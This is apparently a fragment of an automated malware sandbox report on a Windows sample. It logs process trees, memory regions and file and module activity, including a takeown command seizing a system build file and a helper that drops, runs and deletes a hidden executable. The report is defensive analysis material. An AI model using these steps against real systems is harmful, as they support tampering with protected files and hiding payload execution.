| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "restaurant.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "restaurant.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #96: taskeng.exe
0
0
| Information | Value |
|---|---|
| ID | #96 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {11D15CB3-428A-49D4-BA71-4E4ADA506DB6} S-1-5-18:NT AUTHORITY\System:Service: |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:28, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:33 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x72c |
| Parent PID | 0x318 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
744
0x
FB0
0x
878
0x
5F4
0x
8DC
0x
810
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000002bbf620000 | 0x2bbf620000 | 0x2bbf63ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002bbf620000 | 0x2bbf620000 | 0x2bbf62ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000002bbf630000 | 0x2bbf630000 | 0x2bbf636fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002bbf640000 | 0x2bbf640000 | 0x2bbf653fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002bbf660000 | 0x2bbf660000 | 0x2bbf6dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002bbf6e0000 | 0x2bbf6e0000 | 0x2bbf6e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000002bbf6f0000 | 0x2bbf6f0000 | 0x2bbf6f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002bbf700000 | 0x2bbf700000 | 0x2bbf701fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x2bbf710000 | 0x2bbf7cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002bbf7d0000 | 0x2bbf7d0000 | 0x2bbf7d6fff | Private Memory | rw |
|
|
|
- |
| taskeng.exe.mui | 0x2bbf7e0000 | 0x2bbf7e0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002bbf7f0000 | 0x2bbf7f0000 | 0x2bbf7f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002bbf800000 | 0x2bbf800000 | 0x2bbf800fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002bbf810000 | 0x2bbf810000 | 0x2bbf810fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002bbf840000 | 0x2bbf840000 | 0x2bbf93ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002bbf940000 | 0x2bbf940000 | 0x2bbf9bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002bbf9c0000 | 0x2bbf9c0000 | 0x2bbfa6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002bbf9c0000 | 0x2bbf9c0000 | 0x2bbfa3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002bbfa60000 | 0x2bbfa60000 | 0x2bbfa6ffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x2bbfa70000 | 0x2bbfbb0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002bbfa70000 | 0x2bbfa70000 | 0x2bbfc2ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x2bbfa70000 | 0x2bbfb45fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000002bbfa70000 | 0x2bbfa70000 | 0x2bbfbf7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002bbfc20000 | 0x2bbfc20000 | 0x2bbfc2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002bbfc30000 | 0x2bbfc30000 | 0x2bbfdb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000002bbfdc0000 | 0x2bbfdc0000 | 0x2bbfe7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002bbfe80000 | 0x2bbfe80000 | 0x2bbff7ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x2bbff80000 | 0x2bc02b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002bc02c0000 | 0x2bc02c0000 | 0x2bc033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002bc0340000 | 0x2bc0340000 | 0x2bc03bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002bc03c0000 | 0x2bc03c0000 | 0x2bc043ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002bc0440000 | 0x2bc0440000 | 0x2bc04bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff130000 | 0x7df5ff130000 | 0x7ff5ff12ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff72187c000 | 0x7ff72187c000 | 0x7ff72187dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff72187e000 | 0x7ff72187e000 | 0x7ff72187ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff721880000 | 0x7ff721880000 | 0x7ff72197ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff721980000 | 0x7ff721980000 | 0x7ff7219a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7219a4000 | 0x7ff7219a4000 | 0x7ff7219a5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7219a6000 | 0x7ff7219a6000 | 0x7ff7219a7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7219a8000 | 0x7ff7219a8000 | 0x7ff7219a8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7219aa000 | 0x7ff7219aa000 | 0x7ff7219abfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7219ac000 | 0x7ff7219ac000 | 0x7ff7219adfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7219ae000 | 0x7ff7219ae000 | 0x7ff7219affff | Private Memory | rw |
|
|
|
- |
| taskeng.exe | 0x7ff7224f0000 | 0x7ff72253cfff | Memory Mapped File | rwx |
|
|
|
- |
| tschannel.dll | 0x7ffaf0230000 | 0x7ffaf0238fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffaf41b0000 | 0x7ffaf41dbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #97: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #97 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:29, Reason: Child Process |
| Unmonitor | End Time: 00:04:33, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x118 |
| Parent PID | 0xec4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
8E0
0x
934
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000b90000 | 0x00b90000 | 0x04b8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004b90000 | 0x04b90000 | 0x04baffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b90000 | 0x04b90000 | 0x04b9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004ba0000 | 0x04ba0000 | 0x04ba3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bb0000 | 0x04bb0000 | 0x04bb1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04bb0000 | 0x04bb4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004bc0000 | 0x04bc0000 | 0x04bd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004be0000 | 0x04be0000 | 0x04c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04c5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c60000 | 0x04c60000 | 0x04c63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004c70000 | 0x04c70000 | 0x04c70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c80000 | 0x04c80000 | 0x04c81fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c90000 | 0x04c90000 | 0x04d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004dd0000 | 0x04dd0000 | 0x04dd0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004de0000 | 0x04de0000 | 0x04deffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04df0000 | 0x04eadfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004eb0000 | 0x04eb0000 | 0x04eeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ef0000 | 0x04ef0000 | 0x05077fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x05080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005090000 | 0x05090000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x050a0000 | 0x050c9fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000050a0000 | 0x050a0000 | 0x05220fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06630000 | 0x06966fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f510000 | 0x7f510000 | 0x7f60ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f610000 | 0x7f610000 | 0x7f632fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f636000 | 0x7f636000 | 0x7f636fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f639000 | 0x7f639000 | 0x7f63bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f63c000 | 0x7f63c000 | 0x7f63efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f63f000 | 0x7f63f000 | 0x7f63ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #98: vidhs3md.exe
179
0
| Information | Value |
|---|---|
| ID | #98 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:29, Reason: Child Process |
| Unmonitor | End Time: 00:04:43, Reason: Self Terminated |
| Monitor Duration | 00:00:14 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbd4 |
| Parent PID | 0xa40 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
43C
0x
888
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x00290000 | 0x002b9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x00747fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x00900fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x01d0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x01e2ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74380000 | 0x74411fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | os_pid = 0xf00, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x745d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
